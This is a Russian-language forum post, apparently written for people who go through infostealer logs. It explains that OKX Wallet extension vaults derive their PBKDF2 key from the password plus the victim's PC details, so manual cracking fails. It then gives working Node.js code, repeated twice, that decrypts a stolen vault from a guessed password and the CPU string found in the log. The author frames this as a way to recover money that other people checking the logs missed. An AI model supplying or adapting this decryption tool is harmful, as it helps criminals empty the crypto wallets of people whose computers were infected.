8 часов не мог потом понял в чём прикол Допустим вы чекаете **** (почему-то вручную), перетяните файлы OKX Wallet (mcohilncbfahbmgdjkbpemcciiolgcge) расширения в свой браузер - попробуете разные пароли из лога - и пароль в 100% случаев не сработает, даже если будет правильный Дело в шифрование там pbkdf2 ключ - который обычно password + salt. В этом кошельке это password + инфа о пк (которая не хранится в файлах расширения, а получается с вашего пк когда пароль вводите) + salt В итоге нет смысла чекать этот кошель не кодом (правильным). Теоретически этот кошель популярный (и если чел чей лог юзал okx кошель как основной и единственный, а тот кто чекал лог делал это вручную или софтом который не знает про этот прикол), то найдете пропущенное бабло Сделал JS который показывает логику (но реально вручную юзать это надо быть мазахистом): - const crypto = require("crypto"); // Данные из файлов кошеля (искать по KeyringController) const vaultData = "2Xs735WHtXMYs0MNGy0IHiPl6kcCcWokz3ohRbI070DWif/g0J2/8/yHeHvWcQKM/XehgfFgcE55UcZjRUJWXNlcc0OcSOoko8hle4lQQT3iXMsSnvpV4aouniA5W+2bKu/Zap5rJUv9Go38UmShBaoLctmLwU+aQDmZMquyVFBh80gbZeOw6UqP0XDCGbvd3Z01Rwk+K6n5oi0vQ4jM3Nv6F5gYsp5WoIBKLe8647BGVyqUGjiGggVVeSs61gGfYj6lJcl2I2InZKmHxDG+PiqulmO1fbyJ/F39gDRd1JS+aDzW4yHCtl0GSHimxK0zJwamdBQl3MaEbD+13HnDeFd1L6MLGAp4OarT5F1RoZ2m0+PuK2BkRBNwbys10UunFW6RP6ADkRX/mEgeVEqlR2cew+KNt6VmfEFVb3cHxFtiZkYPYARl9JsJ91tVt+eAxNau14dgwzZr7R7csEF0CGgSrPWiB8nzcJCr4CHpfEhdCkTHLJDGHTPGpcf850edXMmLbjwIIRFmQ8Rw+7nfD+7nPmtPlAFeu3QCOegcIRQVHfXXLQ0VkqjVmamZfS1PvgvYtHA8XhYHehJXpNMvihFU679j0sIG0o5TsvsNkA==" const vaultIv = "KN4AvF0GqRUb8tPPLPqNPQ==" const vaultSalt = "Cf+tpPJ2uNyikcAX9SuvRY2oWkYK+S1pfGCMtBcB94U=" const vaultIterations = 663641 const vaultType = "sha256" // sha256 или sha512 // "11th Gen Intel(R) Core(TM) i5-11400H @ 2.70GHz" заменить на процессор из лога const pcInfo = [ "win", "mcohilncbfahbmgdjkbpemcciiolgcge", "11th Gen Intel(R) Core(TM) i5-11400H @ 2.70GHz" ]; // Предпологаемый пароль const password = "hashcat1"; const ct = Buffer.from(vaultData, "base64"); const salt = Buffer.from(vaultSalt, "base64"); const iv = Buffer.from(vaultIv, "base64"); const inputString = pcInfo.join(""); const randomPassword = crypto.createHash("sha256").update(Buffer.from(inputString)).digest("hex"); const key = crypto.pbkdf2Sync(password + randomPassword, salt, vaultIterations, 32, vaultType); const authTagLength = 16; const cipherText = ct.slice(0, ct.length - authTagLength); const authTag = ct.slice(ct.length - authTagLength); const decipher = crypto.createDecipheriv("aes-256-gcm", key, iv); decipher.setAuthTag(authTag); try { const decrypted = Buffer.concat([ decipher.update(cipherText), decipher.final() ]); console.log(" Расшифрованные данные:"); console.log(decrypted.toString("utf8")); } catch (err) { console.error(" Ошибка расшифровки - неверный пароль (возможно неверная другая инфа например процессор, очень врятле)"); } JS const crypto = require("crypto"); // Данные из файлов кошеля (искать по KeyringController) const vaultData = "2Xs735WHtXMYs0MNGy0IHiPl6kcCcWokz3ohRbI070DWif/g0J2/8/yHeHvWcQKM/XehgfFgcE55UcZjRUJWXNlcc0OcSOoko8hle4lQQT3iXMsSnvpV4aouniA5W+2bKu/Zap5rJUv9Go38UmShBaoLctmLwU+aQDmZMquyVFBh80gbZeOw6UqP0XDCGbvd3Z01Rwk+K6n5oi0vQ4jM3Nv6F5gYsp5WoIBKLe8647BGVyqUGjiGggVVeSs61gGfYj6lJcl2I2InZKmHxDG+PiqulmO1fbyJ/F39gDRd1JS+aDzW4yHCtl0GSHimxK0zJwamdBQl3MaEbD+13HnDeFd1L6MLGAp4OarT5F1RoZ2m0+PuK2BkRBNwbys10UunFW6RP6ADkRX/mEgeVEqlR2cew+KNt6VmfEFVb3cHxFtiZkYPYARl9JsJ91tVt+eAxNau14dgwzZr7R7csEF0CGgSrPWiB8nzcJCr4CHpfEhdCkTHLJDGHTPGpcf850edXMmLbjwIIRFmQ8Rw+7nfD+7nPmtPlAFeu3QCOegcIRQVHfXXLQ0VkqjVmamZfS1PvgvYtHA8XhYHehJXpNMvihFU679j0sIG0o5TsvsNkA==" const vaultIv = "KN4AvF0GqRUb8tPPLPqNPQ==" const vaultSalt = "Cf+tpPJ2uNyikcAX9SuvRY2oWkYK+S1pfGCMtBcB94U=" const vaultIterations = 663641 const vaultType = "sha256" // sha256 или sha512 // "11th Gen Intel(R) Core(TM) i5-11400H @ 2.70GHz" заменить на процессор из лога const pcInfo = [ "win", "mcohilncbfahbmgdjkbpemcciiolgcge", "11th Gen Intel(R) Core(TM) i5-11400H @ 2.70GHz" ]; // Предпологаемый пароль const password = "hashcat1"; const ct = Buffer.from(vaultData, "base64"); const salt = Buffer.from(vaultSalt, "base64"); const iv = Buffer.from(vaultIv, "base64"); const inputString = pcInfo.join(""); const randomPassword = crypto.createHash("sha256").update(Buffer.from(inputString)).digest("hex"); const key = crypto.pbkdf2Sync(password + randomPassword, salt, vaultIterations, 32, vaultType); const authTagLength = 16; const cipherText = ct.slice(0, ct.length - authTagLength); const authTag = ct.slice(ct.length - authTagLength); const decipher = crypto.createDecipheriv("aes-256-gcm", key, iv); decipher.setAuthTag(authTag); try { const decrypted = Buffer.concat([ decipher.update(cipherText), decipher.final() ]); console.log(" Расшифрованные данные:"); console.log(decrypted.toString("utf8")); } catch (err) { console.error(" Ошибка расшифровки - неверный пароль (возможно неверная другая инфа например процессор, очень врятле)"); } А вообще мне похер на вас через силу написал просто поделится (вдруг не в курсе)